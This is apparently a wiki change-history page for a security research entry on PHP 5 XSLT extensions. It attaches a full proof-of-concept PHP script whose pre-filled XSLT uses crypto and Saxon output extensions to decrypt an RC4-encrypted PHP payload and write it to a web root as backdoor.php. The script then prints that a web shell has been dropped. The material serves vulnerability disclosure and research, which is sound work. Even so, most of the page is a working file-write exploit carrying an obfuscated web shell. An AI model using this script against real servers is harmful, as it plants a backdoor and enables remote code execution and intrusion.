Changes for page Application_PHP5
on 2012/01/16 11:37
on 2012/01/16 11:39
Summary
-
Page properties (1 modified, 0 added, 0 removed)
-
Attachments (0 modified, 1 added, 0 removed)
Details
- Page properties
-
- Content
-
... ... @@ -14,7 +14,7 @@ 14 14 15 15 == PoC with crypto == 16 16 17 -A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 17 +A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script ([[attach:php539-xslt.php]]) will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 18 18 19 19 = Executing PHP code = 20 20
- php539-xslt.php
-
- Author
-
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,0 +1,1 @@ 1 +2.0 KB - Content
-
... ... @@ -1,0 +1,68 @@ 1 + 2 +<?php 3 + 4 +// Get parameters 5 +$action = $_POST['action']; 6 +$xml = $_POST['xml']; 7 +$xsl = $_POST['xsl']; 8 + 9 +print "<html><body>"; 10 +if ($action == "transform") { 11 + 12 + print "<h2>Ready to transform ...</h2><br/>"; 13 + 14 + # LOAD XML FILE 15 + $xmldom = new DOMDocument(); 16 + print "XML: <pre>".htmlentities($xml)."</pre><br/>"; 17 + $xmldom->loadXML($xml); 18 + 19 + # LOAD XSLT FILE 20 + $xsldom = new DOMDocument(); 21 + print "XSL: <pre>".htmlentities($xsl)."</pre><br/>"; 22 + $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted ! 23 + 24 + # START XSLT 25 + $xslproc = new XSLTProcessor(); 26 + $xslproc->importStylesheet($xsldom); 27 + 28 + # TRANSFORM & PRINT 29 + $output = $xslproc->transformToXML($xmldom); // File creation ! 30 + print "Output: <pre>".htmlentities($output)."</pre><br/>"; 31 + 32 +} else { 33 + 34 + # DISPLAY A PRE-FILLED FORM 35 + print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>"; 36 + print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>"; 37 + print "<form method='post'>"; 38 + print "XML document:<br/>"; 39 + print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>"; 40 + print "XSLT code:<br/>"; 41 + print "<textarea name='xsl' rows='20' cols='130'>"; 42 +print <<<XSLT 43 +<xsl:stylesheet 44 + version="1.0" 45 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 46 + xmlns:cry="http://exslt.org/crypto" 47 + xmlns:sax="http://icl.com/saxon" 48 + extension-element-prefixes="cry sax"> 49 + 50 + <xsl:template match="/"> 51 + <sax:output href="/var/www/xxx/backdoor.php" method="text"> 52 + <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/> 53 + </sax:output> 54 + <xsl:text>A webshell have been dropped</xsl:text> 55 + </xsl:template> 56 + 57 +</xsl:stylesheet> 58 +XSLT; 59 + print "</textarea><br/><br/>"; 60 + print "<input type='hidden' name='action' value='transform'/>"; 61 + print "<input type='submit'/></form>"; 62 + 63 +} 64 +print "</body></html>"; 65 + 66 +?> 67 + 68 +